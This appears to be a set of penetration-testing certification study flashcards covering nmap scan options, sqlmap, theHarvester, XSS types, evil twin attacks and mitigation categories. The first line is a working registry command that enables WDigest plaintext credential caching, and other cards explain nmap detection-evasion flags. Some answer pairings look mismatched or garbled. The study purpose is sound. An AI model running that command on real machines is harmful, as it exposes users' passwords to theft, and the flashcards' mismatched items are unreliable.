reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogoCredential /t REG_DWORD /d 1

classified as a man-in-the-middle attack.

replay attack

-F

scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan.

-iR

scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the -iR 50 option with the nmap command

-T1

scan in sneaky mode. In this mode, a port will be scanned once every 15 seconds. As such, this type of scan is very slow. However, the slowness also makes the scan harder to detect.

-f

scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.

-D

send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.

refers to a state of shared understanding between the client and the tester regarding the security posture of the client's network.

situational awareness

is an open source tool used to automate SQL injection attacks against web applications with database back ends. is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities.

sqlmap

communication trigger happens when the penetration test progresses from one phase to another.

stages

considered server-side exploits because the malicious scripts are embedded on a server. When the user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions.

stored/persistent and reflected XSS exploits

Requiring complex passwords and implementing account restrictions are examples of

technological mitigation strategies

Implementing directional wireless antennas and manipulating access point power levels to prevent signal emanation are examples of

technological mitigation strategies.

Implementing multifactor authentication for VPN connections is an example of a

technological mitigation strategy

Implementing a mantrap at the main entrance is an example of a

technological mitigation strategy.

You are a penetration tester, and you are conducting a test for a new client. While attempting phishing, you were able to retrieve the initial VPN user domain credentials from a member of the IT department. Then you obtained hashes over the VPN and effortlessly cracked them by using a dictionary attack. What remediation steps should you recommend to the client? (Choose three.)

the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that use Transport Layer Security (TLS) or Secure Socket Layer (SSL). The algorithms that cipher suites usually contain include a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. whois tools gather information from public records about domain ownership.

theHarvester

an individual within the target organization, typically an IT administrator or a manager, who has a direct line of communication with the penetration tester. This individual is usually responsible for de-confliction and de-escalation communications between the client and the tester.

trusted agent

the tester first conducts a deauthentication attack to disconnect victims' wireless devices from the real network. These devices then automatically reconnect to the tester's wireless access point that has been configured with the same SSID as the target organization. The tester will likely boost the gain on the evil twin's radios because most wireless network interfaces will default to the access point with the strongest signal.

typical evil twin attack